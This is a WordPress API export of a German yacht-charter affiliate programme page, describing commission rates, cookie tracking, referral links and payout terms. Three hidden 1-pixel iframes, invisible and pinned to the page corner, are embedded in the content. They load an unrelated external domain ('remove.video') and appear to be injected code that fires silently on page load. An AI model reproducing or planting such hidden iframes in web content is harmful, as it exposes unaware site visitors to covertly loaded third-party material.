{"id":412111,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/yachtcharter-partnerprogramm\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"yachtcharter-partnerprogramm","status":"publish","type":"page","link":"https:\/\/skippercity.com\/de\/yachtcharter-partnerprogramm\/","title":{"rendered":"Yachtcharter Partnerprogramm"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412111\" class=\"elementor elementor-412111 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Yachtcharter Partnerprogramm<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Schnelle Fakten:<\/strong><\/span><\/p>\n<ul>\n<li>Am besten bezahltes Partnerprogramm<\/li>\n<li>20-25% von unserer Provision f\u00fcr die Bootsvermietung<\/li>\n<li>Provisionen auf Lebenszeit<\/li>\n<li>365 Tage Cookie-Verfallsdatum<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;Es wurden keine \\u00dcberschriften auf dieser Seite gefunden.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tInhalts\u00fcbersicht\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Yachtcharter Partnerprogramm<\/h2>\n<p>Wenn Sie eine Website mit Kunden haben, die sich f\u00fcr das Chartern von Yachten &#8211; Segelboote, Gulets, Motoryachten, Superyachten &#8211; \u00fcberall auf der Welt interessieren, w\u00e4ren wir an einer Partnerschaft mit Ihnen interessiert.<\/p>\n<p><u><b>Wir lieben Partner!<\/b><\/u><\/p>\n<p>Das Yachtco Partnerprogramm erm\u00f6glicht es Ihnen, Geld mit Yachtcharter zu verdienen, indem Sie einfach einen Link von Ihrer Seite zu unserer Seite hinzuf\u00fcgen.<\/p>\n<h2>Wie funktioniert das?<\/h2>\n<p>Wenn ein Kunde <strong>auf Ihren Link auf Ihrer Website<\/strong> (oder in Ihrem Blog oder in den sozialen Medien) <strong>klickt<\/strong>, auf unserer Website landet und dann ein Boot \u00fcber uns chartert, wird Ihnen ein Prozentsatz der Provision gem\u00e4\u00df unseren Gesch\u00e4ftsbedingungen gutgeschrieben. Alles wird \u00fcberwacht (elektronisch und offline) und wir \u00fcberwachen den Lead-Status f\u00fcr Sie.<\/p>\n<p><strong>Ein Makler (also wir) erh\u00e4lt eine Geb\u00fchr<\/strong> auf den Nettocharterwert einer Schiffsbuchung (ohne APA oder zus\u00e4tzliche bestellte Artikel oder Dienstleistungen). Diese Provision h\u00e4ngt vom Standort, dem Bootstyp und den Provisionen in der Branche ab. <strong>Der Partner (d.h. Sie) erh\u00e4lt 20-25%<\/strong> als Basissatz f\u00fcr diese vom Makler verdiente Geb\u00fchr.<\/p>\n<p><b>Skippercity ist stolz darauf, alle Charterkunden treu zu betreuen, und deshalb werden die Partner mit 20%-25% unserer Provision auf alle Buchungen von Kunden, die zu uns zur\u00fcckkehren, entsch\u00e4digt.<\/b><\/p>\n<p>Unser System verfolgt Kunden, die zuvor \u00fcber einen Partner angefragt oder gebucht haben, so dass wir die Provisionen immer an den Partner zur\u00fcckzahlen k\u00f6nnen. Skippercity respektiert die Einf\u00fchrung und bietet den Partnern eine Einf\u00fchrungsgeb\u00fchr an, wenn der Kunde zu Skippercity au\u00dferhalb des Partnerprogramms (d.h. ohne Cookies) zur\u00fcckkehrt, um den Link zu honorieren, den er uns gegeben hat, da er zuvor \u00fcber einen Partner zu uns gekommen ist.<\/p>\n<p>3.000 EUR ist der durchschnittliche Nettocharterwert, ab dem Sie Ihre Provision erhalten. Es gelten unsere Allgemeinen Gesch\u00e4ftsbedingungen.<\/p>\n<p>Wir haben Umfragem\u00f6glichkeiten, stilvolle Bilder und Buttons f\u00fcr Sie. Diese sind alle von Ihrem Partner &#8222;Dashboard&#8220;, so dass alles, was Sie tun m\u00fcssen, ist kopieren und f\u00fcgen Sie den Code in Ihre Website, und alle von Ihnen sind bereit zu gehen!<\/p>\n<p>Ihre URL f\u00fcr Affiliates ist https:\/\/skippercity.com\/?ref=username. Sie f\u00fcgen einfach den Code (?ref=?ref=username) am Ende eines jeden Links zu Skippercity ein, und alles wird von dort aus \u00fcberwacht!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/de\/werden-sie-unser-partner\/\">Wenn Sie daran interessiert sind, sich f\u00fcr unser Partnerprogramm anzumelden, klicken Sie einfach hier, um sich anz<\/a> umelden, und wir werden Ihren Antrag auf Teilnahme am Programm bearbeiten.<\/p>\n<p>Der gesamte Inhalt der SkipperCity Website ist urheberrechtlich gesch\u00fctzt. Wir ermutigen unsere Partner nicht, Inhalte von https:\/\/skippercity.com zu verwenden und das Material auf ihrer eigenen Website in irgendeiner Weise zu kopieren oder zu vervielf\u00e4ltigen. Sie k\u00f6nnen sich aber gerne eigene Inhalte ausdenken und auf uns verlinken.<\/p>\n<h2>Wie wir Verk\u00e4ufe verfolgen<\/h2>\n<p>Alle Kunden, die von Ihrer Website kommen, werden &#8222;gekocht&#8220;, und Ihr Konto wird durch Cookies mit Ihnen verbunden. Wenn ein Kunde uns eine Anfrage schickt oder ein Konto bei uns einrichtet, tun wir das, was wir am besten k\u00f6nnen &#8211; wir empfehlen das richtige Boot, regeln den Vertrag und die Zahlungen und sorgen daf\u00fcr, dass der Kunde an Bord kommt.<\/p>\n<p>Wenn der Kunde, der eine Yacht chartert, von Ihrer Website kommt, werden wir einen Teil der Provision mit Ihnen teilen.<\/p>\n<h2>Wie werden Sie bezahlt?<\/h2>\n<p>Wir bezahlen unsere Partner per Bank\u00fcberweisung oder \u00fcber Stripe.<\/p>\n<p>Die Mitglieder werden einen Monat nach der zufriedenstellenden Fertigstellung der Charta bezahlt &#8211; dies ist die branchen\u00fcbliche Vorgehensweise f\u00fcr alle interessierten Parteien. Alle Teilnehmer werden nach erfolgreichem Abschluss des Charters bezahlt, denn wenn es w\u00e4hrend des Charters Probleme gibt, wollen wir sicherstellen, dass die Makler, die Yachtmanager, die Skipper und die Eigent\u00fcmer diese l\u00f6sen, bevor die Kunden von Bord gehen.<\/p>\n<p>F\u00fcr alle stornierten Buchungen (von Kunden oder Eigent\u00fcmern), Partner, Reiseb\u00fcros und alle Empfehlungen werden keine Provisionen gezahlt.<\/p>\n<h2>Wie man sich f\u00fcr das Partnerprogramm anmeldet<\/h2>\n<p>Sie m\u00fcssen eine bestehende Website, einen Blog oder ein soziales Netzwerk mit einem Kundenstamm haben, der den Yachtcharter erg\u00e4nzt (Reisen, Luxusprodukte, Concierge-Dienste usw.), um sich f\u00fcr das Partnerprogramm zu bewerben.<\/p>\n<p>Sie haben keinerlei Risiko oder Kosten f\u00fcr das Partnerprogramm. Sie brauchen nur <a href=\"https:\/\/skippercity.com\/de\/werden-sie-unser-partner\/\">unser Online-Formular auszuf\u00fcllen.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/de\/werden-sie-unser-partner\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Melden Sie sich f\u00fcr unser Yachtcharter-Partnerprogramm an<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Schnelle Links:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/de\/werden-sie-unser-partner\/\">Registrieren\/Anmelden<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/de\/partner-login\/\">Anmeldung<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/de\/mein-konto\/\">Ihr Partnerkonto<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Yachtcharter Partnerprogramm Schnelle Fakten: Am besten bezahltes Partnerprogramm 20-25% von unserer Provision f\u00fcr die Bootsvermietung Provisionen auf Lebenszeit 365 Tage Cookie-Verfallsdatum Inhalts\u00fcbersicht Yachtcharter Partnerprogramm Wenn Sie eine Website mit Kunden haben, die sich f\u00fcr das Chartern von Yachten &#8211; Segelboote, Gulets, Motoryachten, Superyachten &#8211; \u00fcberall auf der Welt interessieren, w\u00e4ren wir an einer Partnerschaft mit [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412111","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/pages\/412111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/comments?post=412111"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/pages\/412111\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/de\/wp-json\/wp\/v2\/media?parent=412111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}